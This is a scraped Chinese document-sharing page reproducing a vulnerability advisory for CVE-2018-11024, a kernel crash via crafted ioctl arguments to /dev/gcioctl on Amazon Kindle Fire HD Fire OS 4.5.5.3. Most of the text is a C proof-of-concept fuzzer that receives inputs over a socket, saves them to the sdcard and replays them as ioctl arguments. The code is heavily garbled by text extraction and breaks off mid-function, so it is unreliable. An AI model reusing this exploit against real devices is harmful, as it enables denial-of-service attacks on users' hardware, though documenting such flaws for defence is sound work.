《(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(15页珍藏版)》请在优知文库上搜索。
1、(CVE-2018-11024) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数 注入特制参数/gcioctl使用命令1077435789并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc#include #include /strlen#include#include /inet_
2、addr#include /write#include #include #include #include #include / Socket boilerplate code taken from here: http:/ server-client-example-c-sockets-Iinux/ *seed, ioctl-idj num-mappingsj num-blobs dev-name-lenj dev-name map_e ntry_t_arr, blobs*/int debug = 1;typedef struct int src_id;int dst_id;int off
3、set; map_entry_t;short tiny_vals18 = 128, 127, 64, 63, 32, 31, 16, 15, 8, 7t % 3, 2,1, 0, 256, 255, -1;int *small_vals;int num_small_vals;/ populates small_vals when calledvoid populate_arrs(int top) int num = 1;int count = 0;while (num top) /printf(,%dn num);num = 1;small_vals = malloc(sizeof(int)*
4、count);memset(small_vals, 0, count);int i = 0;while(num 1) small_valsi = num;i+;small-valsi = num-1;i+;num = 1;small_valsi = 0;small_valsi+l = top;small_valsi+2 = top-1;small_valsi+3 = -1;)/ generate a random value of size size and store it in elem./ value has a weight % chance to be a small valuevo
5、id gen_rand_val(int size, char *elemj int small_weight) int i;if (rand() % 100) small_weight) / do small thingunsigned int idx = (rand() % num_small_vals); printf(Choosing %dn, small-valsidx);switch (size) case 2:idx = (rand() % 18);(short *)elem = tiny_valsidx; break;case 4:*(int *)elem = small_val
6、sidx; break;case 8:*(long long*)elem = small_valsidx;break;default:printf(Damn bro. Size: %dn,j size);exit(-l);else for(i=0; i size; i+) elemi = (char)(rand ()%0xl00);int main(int argc i char *argv)int num_blobs = 0, num_mappings = j i = 0, dev_name_len = 0, j;unsigned int ioctl_id = 0;char *dev_nam
7、e;void *tmp;char *ptr_arr;int *len_arr;unsigned int seed;int sockfd , client_sock i c , read_size;struct sockaddr_in server , client;int msg_size;void *generic_arr264;/ max val for small_vals arrayint top = 8192;int ent = 0;/ chance that our generics are filled with small vals,int default_weight = 5
8、0;populate_arrs(top);int retest = 1;goto rerun;sockfd = socket(AF_INET , SOCK_STREAM , 0);if (sockfd = -1) (printf(nCould not create socket);puts(,Socket created);setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int) 1 , sizeof(in t);server.sin_family = AF_INET;server.sin_addr.s_addr = INADDR_ANY;serv
9、er.sin_port = htons(atoi(argvl);/Bindif( bind(sockfdj(struct sockaddr *)&server , sizeof(server) 0) /print the error messageperror(bind failed. Error*1);return 1;puts(,bind done);listen:/ Listenlisten(sockfd , 3);puts(Waiting for incoming connections.);c = sizeof(struct sockaddr_in);/ accept connect
10、ion from an incoming clientclient_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t *)&c);if (client_sock 0 ) ( recv the entire messagechar *recv_buf = calloc(msg_size, sizeof(char);if (recv_buf = NULL) printf(Failed to allocate recv_bufn);exit(-l);int nrecvd = recv(client_sock, recv_bufj
11、 msg_size, 0);if (nrecvd != msg_size) printf(Error getting all data!n);printf(,nrecvd: %dnmsg_size:%dn, nrecvd, msg_size); eit(-l);/ quickly save a copy of the most recent dataint savefd = open(sdcardsaved, O_WRONLYO_TRUNCO_CREAT, 06 44);if (savefd 0) perror(open saved); exit(-l);int err = Write(SaV
12、efd, recv_bufj msg_size);if (err != msg_size) perror(write saved); exit(-l);fsync(savefd);close(savefd);rerun:if (retest) recv_buf = calloc(msg_sizej sizeof(char);int fd = open(,sdcardsavedj O_RDONLY);if (fd 0) perror(open:);exit(-l);int fsize = lseek(fd, 0, SEEK_END);printf(file size: %dn, fsize);l
13、seek(fdj 0, SEEK_SET); read(fdj recv_buffsize);)char *head = recv_buf;seed = 0;/seed, ioctl-idj num_mappings, num-blobsj dev_name_len, dev_na me, map_entry_t_arri blob-len-arrj blobsmemcpy(8tseedj head, 4);head += 4;memcpy(Sioctl-idj head, 4);head += 4;memcpy(&num_mappings, head, 4);head += 4;memcpy(Snum-blobsj head, 4);head += 4;memcpy(&dev_name_len, head, 4);head += 4;/ srand with new seed srand(seed);* dev name */dev_name = calloc(dev-name-len+lj sizeof(char);